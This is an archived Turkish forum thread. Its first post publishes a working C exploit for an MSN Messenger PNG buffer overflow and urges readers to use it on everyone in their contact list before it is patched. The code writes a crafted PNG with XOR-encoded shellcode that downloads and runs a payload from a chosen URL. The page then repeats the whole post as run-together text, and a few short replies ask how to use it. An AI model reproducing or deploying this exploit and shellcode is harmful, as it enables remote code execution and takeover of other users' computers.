göz kırpmasıyla hack [Arşiv] - MegaTR - YouTUBE Bedava Video izle Resim Resimler Program indir Free Rapid Şiirler ve Güzel Sözler

YILMAZ K.

05-27-2006, 02:53 PM

göz kırpmasıyla hack Kulaga Biraz Saçma gibi Gelebilir.!Ama Gerçek
Bir Zamanlar Görüntü Resmi Expoit’i Hazirladi Msn Açiqi Kapatti Kimisi Cam’a Exploit hazirladi Msn Onunda Açigini Kapatti Simdide Göz Kirpmalarinaa Msn Bunuda Açigini Kapatacagindan Emin Olabilirsinizz..! Açik Kapanmadan Sömürün Bütün Msndeki Kisileri

Kod:

(’binary’ encoding is not supported, stored as-is) /*
*
* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit
* Bug discoveried by Core Security Technologies ( color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links]))
* Exploit coded By ATmaCA
* Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.
* E-Mail: atmaca_at_icqmail.com
* Credit to kozan and delikon
* Usage:exploit <OutputPath> <Url>
*
*/

/*
*
* Tested with MSN Messenger 6.2.0137
* This vulnerability can be exploited on Windows 2000 (all service packs)
* and Windows XP (all service packs) that run vulnerable
* clients of MSN Messenger.
*
*/

/*
*
* After creating vuln png image, open
* MSN Messenger and select i**** as your display picture in
* "Tools->Change Display Picture".
*
*/

#include <stdio.h>
#include <stdlib.h>
#include <conio.h>
#include <string.h>

#ifdef __BORLANDC__
#include <mem.h>
#endif

#define NOP 0x90

char png_header[] =
"\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\ x 49\x48\x44\x52"
"\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\ x 00\x9D\xB7\x81"
"\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53";

char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF";

/* Generic win32 http download shellcode
xored with 0x1d by delikon ( color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])) */
char shellcode[] = "\xEB"
"\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\ x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF"
"\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\ x 1D\x94\xDE\x4D\x75\x93\x53\x13"
"\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\ x 4C\x75\x68\x6F\x71\x70\x49\xE2"
"\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\ x 2C\xD4\x4C\x4C\x90\x2A\x4B\x90"
"\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\ x F5\x30\x1D\x1D\x1D\x4C\x4A\xE2"
"\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\ x F5\x04\x1D\x1D\x1D\xE2\xCD\x48"
"\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\ x 01\xB0\x96\x75\x15\x94\xF5\x43"
"\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\ x 21\x96\x49\x18\x65\x1C\xF7\x96"
"\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\ x 96\x1C\xF3\x2C\xE2\xE1\x2C\xDD"
"\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\ x 26\x61\x39\x09\x68\xFC\x96\x47"
"\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\ x 96\x19\x96\x1C\xF5\xF4\x1F\x1D"
"\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\ x 32\xE2\xE2\xE2\x70\x75\x75\x33"
"\x78\x65\x78\x1D";

FILE *di;
int i = 0;
short int weblength;
char *web;
char *pointer = NULL;
char *newshellcode;

/*xor cryptor*/
char *Sifrele(char *Name1)
{
char *Name=Name1;
char xor=0x1d;
int Size=strlen(Name);
for(i=0;i<Size;i++)
Name=Name^xor;
return Name;
}

void main(int argc, char *argv[])
{

if (argc < 3)
{
printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n");
printf("Bug discoveried by Core Security Technologies ( color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links]))\n");
printf("Exploit coded By ATmaCA\n");
printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n");
printf("Web: color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])n");
printf("E-Mail: atmaca_at_icqmail.com\n");
printf("Credit to kozan and delikon\n\n");
printf("\tUsage:exploit <OutputPath> <Url>\n");
printf("\tExample:exploit vuln.png color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])");

return;
}

web = argv[2];

if( (di=fopen(argv[1],"wb")) == NULL )
{
printf("Error opening file!\n");
return;
}
for(i=0;i<sizeof(png_header)-1;i++)
fputc(png_header,di);

/*stuff in a couple of NOPs*/
for(i=0;i<99;i++)
fputc(NOP,di);

weblength=(short int)0xff22;
pointer=strstr(shellcode,"\x22\xff");
weblength-=strlen(web)+1;
memcpy(pointer,&weblength,2);
newshellcode = new char[sizeof(shellcode)+strlen(web)+1];
strcpy(newshellcode,shellcode);
strcat(newshellcode,Sifrele(web));
strcat(newshellcode,"\x1d");

//shell code
for(i=0;i<strlen(newshellcode);i++)
fputc(newshellcode,di);

for(i=0;i<(83-strlen(web));i++) //NOPs
fputc(NOP,di);

/*Overwriting the return address (EIP)*/
/*0x005E0547 - ret */
fputc(0x47,di);
fputc(0x05,di);
fputc(0x5e,di);
fputc(0x00,di);

for(i=0;i<sizeof(pngeof)-1;i++)
fputc(pngeof,di);

printf("Vulnarable png file %s has been generated!\n",argv[1]);

fclose(di);
}


Web Stats
MegaTR - YouTUBE Bedava Video izle Resim Resimler Program indir Free Rapid Şiirler ve Güzel Sözler > Msn & Camfrog > Msn, Icq, Yahoo Messenger Hakkında Herşey > göz kırpmasıyla hack PDA göz kırpmasıyla hack YILMAZ K. 05-27-2006, 02:53 PM göz kırpmasıyla hack Kulaga Biraz Saçma gibi Gelebilir.!Ama Gerçek Bir Zamanlar Görüntü Resmi Expoit’i Hazirladi Msn Açiqi Kapatti Kimisi Cam’a Exploit hazirladi Msn Onunda Açigini Kapatti Simdide Göz Kirpmalarinaa Msn Bunuda Açigini Kapatacagindan Emin Olabilirsinizz..! Açik Kapanmadan Sömürün Bütün Msndeki Kisileri Kod: (’binary’ encoding is not supported, stored as-is) /* * * MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit * Bug discoveried by Core Security Technologies ( color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])) * Exploit coded By ATmaCA * Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved. * E-Mail: atmaca_at_icqmail.com * Credit to kozan and delikon * Usage:exploit <OutputPath> <Url> * / / * * Tested with MSN Messenger 6.2.0137 * This vulnerability can be exploited on Windows 2000 (all service packs) * and Windows XP (all service packs) that run vulnerable * clients of MSN Messenger. * / / * * After creating vuln png image, open * MSN Messenger and select i**** as your display picture in * "Tools->Change Display Picture". * / #include <stdio.h> #include <stdlib.h> #include <conio.h> #include <string.h> #ifdef __BORLANDC__ #include <mem.h> #endif #define NOP 0x90 char png_header[] = "\x89\x50\x4E\x47\x0D\x0A\x1A\x0A\x00\x00\x00\x0D\ x 49\x48\x44\x52" "\x00\x00\x00\x40\x00\x00\x00\x40\x08\x03\x00\x00\ x 00\x9D\xB7\x81" "\xEC\x00\x00\x01\xB9\x74\x52\x4E\x53"; char pngeof[] = "\x90\x90\x90\x59\xE8\x47\xFE\xFF\xFF"; / Generic win32 http download shellcode xored with 0x1d by delikon ( color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])) / char shellcode[] = "\xEB" "\x10\x58\x31\xC9\x66\x81\xE9\x22\xFF\x80\x30\x1D\ x 40\xE2\xFA\xEB\x05\xE8\xEB\xFF" "\xFF\xFF\xF4\xD1\x1D\x1D\x1D\x42\xF5\x4B\x1D\x1D\ x 1D\x94\xDE\x4D\x75\x93\x53\x13" "\xF1\xF5\x7D\x1D\x1D\x1D\x2C\xD4\x7B\xA4\x72\x73\ x 4C\x75\x68\x6F\x71\x70\x49\xE2" "\xCD\x4D\x75\x2B\x07\x32\x6D\xF5\x5B\x1D\x1D\x1D\ x 2C\xD4\x4C\x4C\x90\x2A\x4B\x90" "\x6A\x15\x4B\x4C\xE2\xCD\x4E\x75\x85\xE3\x97\x13\ x F5\x30\x1D\x1D\x1D\x4C\x4A\xE2" "\xCD\x2C\xD4\x54\xFF\xE3\x4E\x75\x63\xC5\xFF\x6E\ x F5\x04\x1D\x1D\x1D\xE2\xCD\x48" "\x4B\x79\xBC\x2D\x1D\x1D\x1D\x96\x5D\x11\x96\x6D\ x 01\xB0\x96\x75\x15\x94\xF5\x43" "\x40\xDE\x4E\x48\x4B\x4A\x96\x71\x39\x05\x96\x58\ x 21\x96\x49\x18\x65\x1C\xF7\x96" "\x57\x05\x96\x47\x3D\x1C\xF6\xFE\x28\x54\x96\x29\ x 96\x1C\xF3\x2C\xE2\xE1\x2C\xDD" "\xB1\x25\xFD\x69\x1A\xDC\xD2\x10\x1C\xDA\xF6\xEF\ x 26\x61\x39\x09\x68\xFC\x96\x47" "\x39\x1C\xF6\x7B\x96\x11\x56\x96\x47\x01\x1C\xF6\ x 96\x19\x96\x1C\xF5\xF4\x1F\x1D" "\x1D\x1D\x2C\xDD\x94\xF7\x42\x43\x40\x46\xDE\xF5\ x 32\xE2\xE2\xE2\x70\x75\x75\x33" "\x78\x65\x78\x1D"; FILE di; int i = 0; short int weblength; char web; char pointer = NULL; char newshellcode; /xor cryptor/ char Sifrele(char Name1) { char Name=Name1; char xor=0x1d; int Size=strlen(Name); for(i=0;i<Size;i++) Name=Name^xor; return Name; } void main(int argc, char argv[]) { if (argc < 3) { printf("MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\n"); printf("Bug discoveried by Core Security Technologies ( color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links]))\n"); printf("Exploit coded By ATmaCA\n"); printf("Copyright ?2002-2005 AtmacaSoft Inc. All Rights Reserved.\n"); printf("Web: color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])n"); printf("E-Mail: atmaca_at_icqmail.com\n"); printf("Credit to kozan and delikon\n\n"); printf("\tUsage:exploit <OutputPath> <Url>\n"); printf("\tExample:exploit vuln.png color=#0000ff[Only Registered Users Can See Links] ([Only Registered Users Can See Links])"); return; } web = argv[2]; if( (di=fopen(argv[1],"wb")) == NULL ) { printf("Error opening file!\n"); return; } for(i=0;i<sizeof(png_header)-1;i++) fputc(png_header,di); /stuff in a couple of NOPs/ for(i=0;i<99;i++) fputc(NOP,di); weblength=(short int)0xff22; pointer=strstr(shellcode,"\x22\xff"); weblength-=strlen(web)+1; memcpy(pointer,&weblength,2); newshellcode = new char[sizeof(shellcode)+strlen(web)+1]; strcpy(newshellcode,shellcode); strcat(newshellcode,Sifrele(web)); strcat(newshellcode,"\x1d"); //shell code for(i=0;i<strlen(newshellcode);i++) fputc(newshellcode,di); for(i=0;i<(83-strlen(web));i++) //NOPs fputc(NOP,di); /Overwriting the return address (EIP)/ /0x005E0547 - ret */ fputc(0x47,di); fputc(0x05,di); fputc(0x5e,di); fputc(0x00,di); for(i=0;i<sizeof(pngeof)-1;i++) fputc(pngeof,di); printf("Vulnarable png file %s has been generated!\n",argv[1]); fclose(di); } yaren123123 07-01-2007, 08:14 PM biraz daha konuyu açarmısın tam anlamadım da xwxserseri 07-01-2007, 08:25 PM şimdi böle bi açık söz konusu bile olmaz... boşuna deneme kardeş Azo Pelo 07-01-2007, 08:53 PM Sen bunu yap gel bide :D yaren123123 07-01-2007, 09:12 PM ya anlamadınız nereye kaydedicem bunu ?mesela (yardımcı olun)